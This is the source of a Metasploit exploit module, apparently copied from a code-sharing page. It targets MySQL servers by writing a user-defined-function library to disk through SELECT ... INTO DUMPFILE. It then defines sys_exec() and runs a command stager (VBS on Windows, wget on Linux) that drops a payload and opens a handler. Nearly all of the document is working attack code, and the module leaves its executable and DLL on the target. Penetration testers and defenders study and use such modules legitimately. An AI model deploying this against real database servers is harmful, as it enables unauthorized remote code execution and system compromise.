Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::MYSQL
10
  include Msf::Exploit::CmdStager
11
  include Msf::OptionalSession::MySQL
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name'           => 'Oracle MySQL UDF Payload Execution',
18
        'Description'    => %q{
19
          This module creates and enables a custom UDF (user defined function) on the
20
          target host via the SELECT ... into DUMPFILE method of binary injection. On
21
          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
22
          permissions not enforced, and the MySQL service runs as LocalSystem.
23

24
          NOTE: This module will leave a payload executable on the target system when the
25
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
26
          and sys_exec() functions.
27
        },
28
        'Author'         =>
29
          [
30
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
31
            'todb', # this Metasploit module
32
            'h00die' # linux addition
33
          ],
34
        'License'        => MSF_LICENSE,
35
        'References'     =>
36
          [
37
            # Bernardo's work with cmd exec via udf
38
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
39
          ],
40
        'Platform'       => ['win', 'linux'],
41
        'Targets'        =>
42
          [
43
            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
44
            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
45
          ],
46
        'DefaultTarget'  => 0,
47
        'DisclosureDate' => '2009-01-16' # Date of Bernardo's blog post.
48
    ))
49
    register_options(
50
      [
51
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
52
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
53
    ])
54
  end
55

56
  def post_auth?
57
    true
58
  end
59

60
  def username
61
    datastore['USERNAME']
62
  end
63

64
  def password
65
    datastore['PASSWORD']
66
  end
67

68
  def login_and_get_sys_exec
69
    # If we have a session make use of it
70
    if session
71
      print_status("Using existing session #{session.sid}")
72
      self.mysql_conn = session.client
73
    else
74
      # otherwise fallback to attempting to login
75
      m = mysql_login(username,password,'mysql')
76
      return unless m
77
    end
78

79
    @mysql_arch = mysql_get_arch
80
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
81
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
82
      mysql_add_sys_exec
83
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
84
    else
85
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
86
    end
87

88
    return m
89
  end
90

91
  def execute_command(cmd, opts)
92
    mysql_sys_exec(cmd, datastore['VERBOSE'])
93
  end
94

95
  def exploit
96
    m = login_and_get_sys_exec()
97

98
    if not m
99
      return
100
    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
101
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
102
      return
103
    else
104
      if @mysql_sys_exec_available
105
        execute_cmdstager({:linemax => 1500, :nodelete => true})
106
        handler
107
      else
108
        print_status("MySQL function sys_exec() not available")
109
        return
110
      end
111
    end
112
    disconnect
113
  end
114
end
115

116